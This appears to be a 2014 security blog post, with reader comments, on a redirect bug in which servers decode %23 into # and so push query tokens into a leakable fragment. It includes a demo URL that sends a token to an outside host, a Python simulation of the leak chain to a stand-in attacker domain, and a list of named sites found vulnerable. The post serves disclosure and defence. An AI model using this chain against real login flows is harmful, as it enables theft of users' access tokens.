Thursday, January 2, 2014

Path Encoding Vulnerability in https/www redirects.

While playing with 302-based header injection (the majority of web servers is not vulnerable to it, btw) I found one tricky, neat bug that can be really useful to leak ?query data by pushing it into the #fragment.

Remark about the difference: the fragment might seem to be more secure than the query. No, I don't think so. There are just thousands of open redirects out there leaking access_tokens. I personally found an open redirect leaking the user's token on 2 out of 3 huge websites I checked. I only stopped looking for open redirects because I don't exploit and there's no market for "facebook access_tokens" (let's create one?)... whatever.

Yes, ?query can be leaked via Referers, but you can easily suppress those; you can never be sure you don't have open redirects.

Tip 1. Do not send sensitive info in the #fragment, because browsers carry the fragment along when they follow a 302 redirect, so the redirect will leak this data.

Problem: many web servers are configured to redirect http://site.com/%23lol to http://www.site.com/#lol. They decode the original percent-encoding when building the Location header, which moves query data into location.hash. And this is a vulnerability.

To demonstrate the bug in the wild I created this demo. The Hard Mode solution, by the way: http://www.sakurity.com/issue_token?hard_mode=1&uri=http://sakurity.com/triple?to=//egorhomakov.com%2523

Any ?private_info can be turned into #private_info and leaked easily with a 302 redirect.

The chain looks like this:
Provider issues a Token -> Client-WWW-redirector%23?Token -> Client-redirector#?Token -> Evil#?Token.
There were basically only two ways servers could "screw" path encoding: https- and www-related redirects.

Tip 2. Check https->http and www.site->site redirects to find the Path Encoding Vulnerability.

Let's check www-redirects against our Lazy list. Here is my lousy script.
For the "/?x=%23x" payload almost nobody is vulnerable, because encoding request.query seems obvious. Only these kept the bare # in their Location:

http://www.olx.in/?x=#x
http://www.target.com?&x=#x
http://www.force.com/?x=#x
http://www.retailmenot.com/?x=#x
http://www.chip.de/?x=#x
http://store.steampowered.com/?x=#x
http://www.iminent.com?x=#x

Let's check '/%23x'

....I killed the script; it only went through the first 500 sites, and the list of those that decode %23 in their Location is long.

Check whether your server turns %23 into # in its redirects, and patch it if you don't want your Single Sign-On to be hacked.
Be careful with encodings. Many servers are configured in a wrong way, and Microsoft IIS is vulnerable by default.
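The chain above and the "does your server turn %23 into #" check, as an added Python model that is not the post's own script: example.com / www.example.com stand for the client site, evil.example for the attacker's host, SECRET for the token a provider appends, and an open redirect at /triple is assumed, as in the demo.

```python
from urllib.parse import parse_qs, unquote, urlsplit, urlunsplit

WWW = "http://www.example.com"   # constructed: the client's canonical www host


def vulnerable_www_location(request_target: str) -> str:
    """Location built from the *decoded* request target, as a misconfigured
    server does: '%23' becomes a bare '#', so the rest of the query turns
    into a fragment."""
    return WWW + unquote(request_target)


def safe_www_location(request_target: str) -> str:
    """Location built from the raw request target; '%23' stays encoded."""
    return WWW + request_target


def browser_follow(current_url: str, location: str) -> str:
    """Models a browser following a 302: when Location has no fragment, the
    fragment of the current URL is carried over to the new URL."""
    cur, new = urlsplit(current_url), urlsplit(location)
    if not new.fragment and cur.fragment:
        new = new._replace(fragment=cur.fragment)
    return urlunsplit(new)


def redirect_decodes_hash(request_target: str, location: str) -> bool:
    """The check from Tip 2: a server that answers a request whose target
    contains '%23' with a Location containing a bare '#' decoded the path."""
    return "%23" in request_target and "#" in location


def run_chain(build_location) -> str:
    """Plays the chain from the post and returns the URL the attacker's host
    receives. The provider appends the token (SECRET, constructed) to a
    redirect URI on the non-www host, which 302s to www; an open redirect
    on www then forwards to its 'to' parameter, evil.example (constructed)."""
    target = "/triple?to=//evil.example%23&code=SECRET"
    on_www = browser_follow("http://example.com" + target, build_location(target))
    to = parse_qs(urlsplit(on_www).query)["to"][0]
    return browser_follow(on_www, "https:" + to)


if __name__ == "__main__":
    print(run_chain(vulnerable_www_location))  # evil.example receives #&code=SECRET
    print(run_chain(safe_www_location))        # the token never leaves www
```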

5 comments:

  1. We've come across that, yep :)

  2. About "Microsoft IIS is vulnerable by default...": you are quite wrong, just IIS 6.5 is vulnerable, and only if the IT doesn't install the patch, but 99% of IIS 6.5 are fixed.

    Just a remark: Apache and nginx are also vulnerable by default if you don't know how to configure them.

    ;)

    1. Really? Do you have a 6.5+ demo online I could check?

      I assumed the last version is vulnerable because all MS sites like microsoft.com and hotmail.com were left vulnerable.

      On top of that, the IIS security team doesn't understand the issue.

    2. Hi there Egor, I'm reading all your posts since early 2013. Can I ask something? Can you give me your email? I'm gonna tell / ask something: I recently found a bug on Facebook and I need your help in confirming it, thanks in advance.

      Here is my email if you want to email me: tolstoivladimir@gmail.com

      -Vladimir
